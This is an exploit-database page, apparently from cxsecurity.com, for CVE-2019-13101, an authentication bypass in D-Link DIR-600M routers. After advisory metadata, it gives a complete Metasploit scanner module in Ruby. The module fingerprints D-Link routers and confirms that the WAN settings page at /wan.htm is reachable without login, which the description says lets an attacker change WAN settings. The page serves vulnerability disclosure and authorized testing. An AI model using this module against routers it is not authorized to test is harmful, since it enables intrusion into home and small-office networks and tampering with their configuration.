D-Link DIR-600M Authentication Bypass (Metasploit)

2019.08.25
Credit: Devendra
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-287


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'CVE-2019-13101 D-Link DIR-600M Incorrect Access Control', 'Description' => %q{ This module attempts to find D-Link router DIR-600M which is vulnerable to Incorrect Access Control. The vulnerability exists in wan.htm, which is accessible without authentication. This vulnerabilty can lead an attacker to manipulate WAN settings. This module has been tested successfully on Firmware Version 3.01,3.02,3.03,3.04,3.05,3.06. }, 'Author' => [ 'Devendra Singh Solanki <devendra0x0[at]gmail.com>' ], 'License' => MSF_LICENSE, 'References' => [ 'CVE', '2019-13101' ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 08 2019')) register_options( [ Opt::RPORT(80) ]) end def run_host(ip) res = send_request_cgi({'uri' => '/login.htm'}) if res.nil? or res.code == 404 print_error("#{rhost}:#{rport} - Host is down.") return end if res and res.code == 200 and res.body =~ /D-Link/ print_good("#{rhost}:#{rport} - It is a D-Link router") else print_error("#{rhost}:#{rport} - Not a D-Link router") return end res = send_request_cgi({'uri' => '/wan.htm'}) if res and res.code == 200 and res.body =~ /PPPoE/ print_good("#{rhost}:#{rport} - Router is vulnerable for Incorrect Access Control. CVE-2019-13101") else print_error("#{rhost}:#{rport} - Router is with different firmware.") return end end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top